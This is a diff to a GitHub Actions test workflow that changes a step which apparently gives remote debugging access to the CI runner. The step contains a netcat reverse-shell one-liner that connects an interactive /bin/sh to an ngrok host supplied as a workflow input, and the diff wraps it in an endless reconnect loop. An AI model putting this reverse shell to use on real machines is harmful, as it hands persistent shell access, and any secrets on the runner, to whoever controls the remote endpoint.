--- a/.github/workflows/call-test.yml
+++ b/.github/workflows/call-test.yml
@@ -299,7 +299,10 @@ jobs:
         sudo apt install -y netcat
         rm -rf /tmp/f || true
         mkfifo /tmp/f
-        cat /tmp/f|/bin/sh -i 2>&1|nc tcp://${{ inputs.ngrok_hostname }} ${{ inputs.ngrok_port }} >/tmp/f
+        while true; do
+          cat /tmp/f|/bin/sh -i 2>&1|nc tcp://${{ inputs.ngrok_hostname }} ${{ inputs.ngrok_port }} >/tmp/f || true
+          sleep 5
+        done
 
     - name: Run tests
       timeout-minutes: ${{ fromJson(steps.collect-tests.outputs.timeout-minutes) }}
